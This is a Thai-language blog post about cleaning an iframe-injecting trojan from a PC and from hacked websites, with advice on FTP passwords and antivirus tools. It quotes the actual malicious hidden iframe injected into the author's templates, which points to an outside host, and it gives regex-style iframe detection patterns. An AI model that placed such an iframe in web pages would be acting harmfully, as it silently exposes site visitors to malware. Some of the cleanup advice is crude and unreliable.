เอาไวรัส Iframe ออกแบบถอนรากหลายๆบทความที่ผมลงไว้เกี่ยวกับไว้รัส Iframe ไม่ได้บอกวีธีถอนรากออกจากเครื่อง บางท่านแก้ไขลบ Iframe แฝงที่ไฟล์ เทมเพลตออก เปลี่ยนพาส FTP ก็แล้ว Format คอมไป 10 รอบก็แล้ว แม่งก็ยังมาอีก ก็แล้วมันมาจากไหนล่ะ ผมนี่เคย Format มา 28 ครั้งอย่างบ้าระห่ำ แม่งก็ยังมา โดนแบบหนักชนิด Userinit Logon Application ไม่สามารถเข้า windows ได้เลยก็เคยมาแล้ว จริงๆแล้วมันแก้ง่ายนิดเดียว คือการทำงานของ Trojan ประเภทนี้เมื่อมันเข้ามายังเครื่องเรา จะเนื่องจากเราไปโหลดงานติดมา หรือจะไปติดมาจากเว็บไซต์อันตรายต่างๆ หรือใช้ช่องโหว่จาก FTP หรือทาง Server ก็ตาม ส่วนของผมโดนมาจาก จากไฟล์ crack โปรแกรมหนึ่ง ซึ่งมันจะสั่งรันสคริปต์เข้าไปฝัง Iframe ไว้ในไฟล์ html, php etc. ที่มีในเครื่องเราทั้งหมด ส่วนวิธ๊เอาออกแบบเร็ว
>> วิธีที่จะเอามันออกจากเครื่องขึ้นอยู่กับชนิดของไวรัส เช่นผมโดนตัวนี้ >> "JS / Generic Exploit.j (Trojan)" ต้องใช้
Kill by mcAfee ซึ่งก่อนหน้านี้ผมใช้ AVG อยู่แต่มันยังไม่รู้ไวรัสตัวนี้ ต้นฉบับเว็บไซต์ผม 4,000 กว่า Template จึงถูกมันฝัง Iframe ลงไปทั้งหมด
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
และ Trojan ชนิดนี้มันจะเข้าไปทำลายระบบ อัพเดท ระบบ licenc ของโปรแกรมที่ Security ต่างๆในคอมเราจดหมดสิ้นโปรแกรมสแกนไวรัสจะไม่สามารถอัพเดทได้ แถมโดนฟ้อง licenc ใช้ไม่ได้อีกระบบกู้คืน Security ล่มเหลวโดยสิ้นเชิงเมื่อรีสตาร์ทเครื่องก็ Userinit Logon ไม่สมารถเข้าหน้า Windows ได้อีก Format อีกก็กลับมาเป็นอีก
สาเหตุที่เป็นซ้ำซาก- ไวรัสตัวแม่ยังอยู่ในเครื่องเรา
- มันจะเข้าไปฝังตัวในทุกๆไฟล์ที่เราคลิกทันที
วิธีแก้ไขหลังจากการที่ถูกมันโจมตีแล้วระบบ Security ต่างๆ ในคอมจะเสียหมด
1.เข้า Safe Mod ไฟล์ใดที่ก่อนหน้านี้เราคลิกเปิดใช้งาน ลบทิ้งให้หมดโดยสิ้นเชิง
2. Format เครื่องใหม่
3.ห้ามยุ่งกับไฟล์ใดๆในเครื่องเราทั้งหมด
4.ลง Driver , Card จอ ตามปกติถ้ารีสตาร์ทคอมแล้วยังปกติก็ใช้ได้
5.ดาวน์โหลดโปรแกรม ไวรัสตัวใหม่อื่นๆมาใช้ อย่าใช้ตัวเก่าที่เคยใช้อยู่เพราะมันเข้าไปแฝงตัวอยู่ในนั้นเรียบร้อยแล้ว ให้ลบทิ้งออกจากเครื่องไป
หลังจากรีสตาร์ทคอมแล้วถ้าเครื่องยังล่มอยู่ให้สังเกตุดูว่าโปรแกรมอะไรที่เราคลิกลงล่าสุด ตัวนั้นแหละที่เป็นเจ้าปัญหา ให้ทำตามตั้งแต่ข้อที่ 1ใหม่ทั้งหมด
___________________________________________________________________________________________
บทความอื่นๆเมื่อเว็บโดนแฮก วาง Iframe / Virus บนหน้า เว็บ ทำอย่างไร ช่วงนี้หลายเว็บโดน hacker วางสคริปไม่พึ่งประสงค์บนหน้าเว็บ ซึ่งบางครั้งก็อาจะโดนจากเว็บที่ใช้ CMS แล้วไม่อัพเดตเวอร์ชั่น แต่หลังๆจะโดนจาก การขโมย user และ password FTP กันมากกว่า แล้วโดนมาจากอะไร มาตามกันต่อไป
หลักการทำงาน แผนการของแฮกเกอร์ คือหาเว็บที่มีช่องโหว่ หรืออาจจะหาเครื่องที่ติดไวรัสหรือโทรจันของเขา อาจจะมาจากไฟล์ crack keygen หรือไฟล์ game trainer cheat ไฟล์พวกนี้มีไวรัส 99% เท่าที่ลองมา เมื่อได้แล้วไฟลืเหล่านี้จะฝังสคริปที่เป็น Trojan Horse หรือ ม้าโทรจันลงมาที่เครื่่องเรา ถ้าหากเราเป็นคนทำเว็บมันก็จะพยายามดักจับ user และ password FTP ของเว็บเรา จากนั้นมันก็ไปวาง code Iframeในไฟล์ index เพื่อ ทำลิ้งเชื่อมต่อไปยังเว็บของเขาเอง เพื่อให้ได้ Google rankings สูงๆ หรือไม่ก็ ลิ้งไปยังไฟล์ Trojan Horse เพื่อให้คนเปิดเว็บเราติดต่อไปเรื่อยๆ บางทีก็จะเป็นโปรแกรมคลิ๊ก googleads
ใครบ้างที่เสี่ยงหากคุณคือเจ้าของเว็บโปรดตรวจสอบว่าคุณใช้สคริปรุ่นปัจจุบัน hosting ของเรามีระบบติดตั้งสคริป joomla mambo wordpress magento ให้แล้ว
หากคุณใช้โปรแกรมที่ crack มา และคุณเป็นคนทำเว็บที่ใช้ ftp
เว็บคุณโดนหรือยังตรวจสอบได้หากใช้ firefox กด Ctrl+u หากใช้ IE 6 (ควรเปลี่ยน) คลิีก view >> view source IE8 คลิ๊ก page >> view source ดูว่า ล่างสุดของเว็บมี code <iframe>...</iframe> หรือไม่ ถ้ามีก็โดนละครับ
ตัวอย่าง
<iframe src=\?http://[^"]*? width=1 height=1 style=\?visibility:hidden;position:absolute\?></iframe>
echo \?<iframe src=\\\?http://[^"]*\? width=1 height=1 style=\\\?visibility:hidden;position:absolute\\\?></iframe>\?;
หรืออาจจะเขียนเป็น Java
วิธีแก้ไขหาไฟล์ที่ Hacker เขียนสคริปไว้ ส่วนใหญ่จะชื่อ index แล้วลบ code สคริปทิ้ง ทางที่ดีควรโหลดมาแล้วใช้โปรแกรม หาให้หมด
เปลี่ยนรหัสผ่าน ของ FTP โดยให้ใช้ ตัวอักษร ตัวเลข และตัวพิเศษ เช่น ^%$@^#% ประกอบกันเป็น รหัสผ่าน
สแกนไวรัสบนเครื่องของเรา ให้หมด ถ้าใช้โปรแกรม Antivirus ที่ Hack มา ก็ถอนออกซะ แล้ว ใช้ระบบ Scan Online เช่น
http://www.eset.com/onlinescan/ http://www.kaspersky.com/virusscanner ติดตั้งตัวกันไวรัสใหม่ที่ไม่เสียเงินหรือซื้อ เพราะไม่แพงไม่ถึงพันบาท
http://www.free-av.com หรือ
http://free.avg.com หรือ Clamwin Opensource Antivirus
ถ้าเป็นไปได้อย่าบันทึกรหัสผ่าน FTP ไว้ที่โปรแกรม
หากคุณใช้โปรแกรม FTP ที่ Crack มาให้ใช้ winscp แทนฟรีและดี
http://winscp.net/eng/download.phpมีไฟล์ระบบเตือน หากมีการเปลี่ยนแปลงขนาดของ index ที่หน้าเว็บ ลองเอาไปใช้กันดู
check_index_script.zipที่มาของบทความ
เมื่อเว็บโดนแฮก วาง Iframe / Virus บนหน้า เว็บ ทำอย่างไร >> colorpack.net
